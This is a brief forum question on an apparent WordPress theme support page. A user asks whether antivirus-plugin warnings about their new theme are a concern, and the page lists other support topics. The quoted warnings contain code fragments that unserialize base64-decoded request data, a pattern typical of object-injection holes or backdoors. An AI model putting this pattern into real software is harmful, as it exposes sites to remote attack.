I use a plugin called antivirus for wordpress. After installing the theme I get these warnings:
REQUEST, $_REQUEST, unserialize( base64_decode( $_REQUEST ) )
id’], $_REQUEST, unserialize( base64_decode( $_REQUEST ) ), $_REQUEST[‘type
Something to worry about?
- Theme support is offered to verified customers only. To post a topic go to your Theme Category and add your question at the page bottom.
- Change Main Background
- revolution slider The page you are trying to access does not exist!
- Button on full width
- Subheader Dropdown menu
- Alignment of bullet points
- Desktop Drop down menu problem
- Woocommerce product Images are not opening in light box neither zoom feature.
- Change font size/alignment of page and post headers
- My footer message is not showing.